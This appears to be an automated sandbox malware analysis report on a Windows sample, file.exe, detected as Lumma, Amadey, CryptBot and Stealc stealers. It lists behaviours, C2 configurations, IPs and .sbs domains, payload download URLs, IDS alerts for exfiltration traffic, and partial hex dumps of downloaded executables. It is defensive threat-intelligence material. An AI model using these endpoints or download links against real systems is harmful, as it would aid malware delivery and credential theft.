Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1559716
MD5: ae0e62a9ae1f471958341b45817b6804
SHA1: e13376d4bdb2e56751dc4c52d9ad24ed55d72877
SHA256: 9b73356104654687374dfab3c5554e15dfb402a1089750d9c431e1c4964de8cb
Tags: exe, user-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected Cryptbot
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file contains section with special chars
Potentially malicious time measurement code found
Query firmware table information (likely to detect VMs)
Sigma detected: New RUN Key Pointing to Suspicious Folder
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

Columns: Name / Description / Attribution / Blogpost URLs / Link

Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: CryptBot
Description: A typical infostealer, capable of obtaining credentials for browsers, crypto currency wallets, browser cookies and credit cards, and of creating screenshots of the infected system. All stolen data is bundled into a zip-file that is uploaded to the C2.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptbot

Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

AV Detection

Source: file.exe Avira: detected
Source: https://librari-night.sbs/3O Avira URL Cloud: Label: malware
Source: http://185.215.113.16/off/def.exePm Avira URL Cloud: Label: phishing
Source: https://cook-rain.sbs/So4 Avira URL Cloud: Label: malware
Source: http://185.215.113.206/icrosoft Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/xM Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php32g Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/random.exe5062384Sa1 Avira URL Cloud: Label: phishing
Source: http://31.41.244.11/files/Lumma111.exe Avira URL Cloud: Label: phishing
Source: http://185.215.113.16/well/random.exev Avira URL Cloud: Label: phishing
Source: https://cook-rain.sbs:443/apiA Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php~v Avira URL Cloud: Label: malware
Source: https://cook-rain.sbs/3n9 Avira URL Cloud: Label: malware
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Lumma111[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: 00000000.00000002.1812668708.00000000009D1000.00000040.00000001.01000000.00000003.sdmp Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 0000000B.00000002.2749590843.0000000000E7E000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
Source: cfc45d1c7c.exe.2708.12.memstrmin Malware Configuration Extractor: LummaC {"C2 url": ["p10tgrace.sbs", "3xp3cts1aim.sbs", "peepburry828.sbs", "p3ar11fter.sbs", "processhol.sbs"], "Build id": "LOGS11--LiveTraffic"}
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\random[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\random[1].exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Lumma111[1].exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\random[1].exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe ReversingLabs: Detection: 31%
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe ReversingLabs: Detection: 39%
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe ReversingLabs: Detection: 44%
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe ReversingLabs: Detection: 34%
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe ReversingLabs: Detection: 42%
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe ReversingLabs: Detection: 52%
Source: file.exe ReversingLabs: Detection: 52%
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1007744001\Lumma111.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[2].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\Lumma111[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1007745001\cfc45d1c7c.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1007747001\064deba48e.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1007746001\686764db73.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[1].exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1007748001\c8a61f4196.exe Joe Sandbox ML: detected
Source: file.exe Joe Sandbox ML: detected
Source: ae87049195.exe, 00000007.00000003.2449281567.00000000077F2000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: -----BEGIN PUBLIC KEY----- memstr_bd56902c-0
Source: file.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 104.21.85.146:443 -> 192.168.2.4:49805 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49827 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49837 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49851 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49858 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49863 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49887 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49891 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49895 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49905 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49920 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.155.248:443 -> 192.168.2.4:49936 version: TLS 1.2
Source: Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: c8a61f4196.exe, 00000021.00000003.2901113043.00000000050E0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\entries\
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\
Source: C:\Users\user\AppData\Local\Temp\1007743001\ae87049195.exe File opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cache2\doomed\
Source: chrome.exe Memory has grown: Private usage: 1MB later: 20MB
Source: firefox.exe Memory has grown: Private usage: 1MB later: 180MB

Networking

Source: Network traffic Suricata IDS: 2856147 - Severity 1 - ETPRO MALWARE Amadey CnC Activity M3 : 192.168.2.4:49742 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2856122 - Severity 1 - ETPRO MALWARE Amadey CnC Response M1 : 185.215.113.43:80 -> 192.168.2.4:49748
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49781 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057662 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (p10tgrace .sbs) : 192.168.2.4:49866 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057668 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (processhol .sbs) : 192.168.2.4:58784 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057697 - Severity 1 - ET MALWARE Observed DNS Query to Lumma Stealer Domain (processhol .sbs) : 192.168.2.4:58784 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057658 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (librari-night .sbs) : 192.168.2.4:52808 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.4:49805 -> 104.21.85.146:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49803 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2057659 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (librari-night .sbs in TLS SNI) : 192.168.2.4:49811 -> 104.21.85.146:443
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49821 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49842 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49844 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49843 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49865 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49852 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49896 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2044696 - Severity 1 - ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2 : 192.168.2.4:49906 -> 185.215.113.43:80
Source: Network traffic Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.4:49968 -> 185.215.113.206:80
Source: Network traffic Suricata IDS: 2054350 - Severity 1 - ET MALWARE Win32/Cryptbotv2 CnC Activity (POST) M4 : 192.168.2.4:49970 -> 34.116.198.130:80
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49827 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49827 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49858 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49858 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49805 -> 104.21.85.146:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49805 -> 104.21.85.146:443
Source: Network traffic Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49868 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49868 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49887 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49820 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49820 -> 172.67.155.248:443
Source: Network traffic Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49891 -> 172.67.155.248:443
Source: Malware configuration extractor URLs: http://185.215.113.206/c4becf79229cb002.php
Source: Malware configuration extractor URLs: p10tgrace.sbs
Source: Malware configuration extractor URLs: 3xp3cts1aim.sbs
Source: Malware configuration extractor URLs: peepburry828.sbs
Source: Malware configuration extractor URLs: p3ar11fter.sbs
Source: Malware configuration extractor URLs: processhol.sbs
Source: Malware configuration extractor IPs: 185.215.113.43
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:09:09 GMTContent-Type: application/octet-streamContent-Length: 4414976Last-Modified: Wed, 20 Nov 2024 18:17:36 GMTConnection: keep-aliveETag: "673e27c0-435e00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 e9 85 3c 67 00 00 00 00 00 00 00 00 e0 00 0e 03 0b 01 02 28 00 fc 49 00 00 96 73 00 00 32 00 00 00 60 c5 00 00 10 00 00 00 10 4a 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 90 c5 00 00 04 00 00 d5 a3 43 00 02 00 40 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5f 00 71 00 73 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 4a c5 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 49 c5 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 e0 70 00 00 10 00 00 00 78 27 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 20 20 20 00 10 00 00 00 f0 70 00 00 00 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 00 71 00 00 02 00 00 00 88 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 90 38 00 00 10 71 00 00 02 00 00 00 8a 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 6d 6f 75 73 7a 66 69 77 00 b0 1b 00 00 a0 a9 00 00 ac 1b 00 00 8c 27 00 00 00 00 00 00 
00 00 00 00 00 00 00 40 00 00 e0 75 69 77 6a 62 6f 71 63 00 10 00 00 00 50 c5 00 00 04 00 00 00 38 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 60 c5 00 00 22 00 00 00 3c 43 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:09:22 GMTContent-Type: application/octet-streamContent-Length: 1871360Last-Modified: Wed, 20 Nov 2024 19:44:44 GMTConnection: keep-aliveETag: "673e3c2c-1c8e00"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 e6 72 3b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 10 04 00 00 be 00 00 00 00 00 00 00 80 4a 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 b0 4a 00 00 04 00 00 23 fc 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 5c 70 05 00 70 00 00 00 00 60 05 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 71 05 00 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 50 05 00 00 10 00 00 00 5e 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 b0 02 00 00 00 60 05 00 00 02 00 00 00 6e 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 70 05 00 00 02 00 00 00 70 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 f0 2a 00 00 80 05 00 00 02 00 00 00 72 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 63 62 76 76 6b 79 6d 00 00 1a 00 00 70 30 00 00 f4 19 00 00 74 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 
00 00 e0 64 76 61 78 6a 79 70 73 00 10 00 00 00 70 4a 00 00 04 00 00 00 68 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 80 4a 00 00 22 00 00 00 6c 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Wed, 20 Nov 2024 20:09:31 GMTContent-Type: application/octet-streamContent-Length: 1910784Last-Modified: Wed, 20 Nov 2024 19:42:21 GMTConnection: keep-aliveETag: "673e3b9d-1d2800"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 e6 72 3b 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 10 04 00 00 be 00 00 00 00 00 00 00 40 4b 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 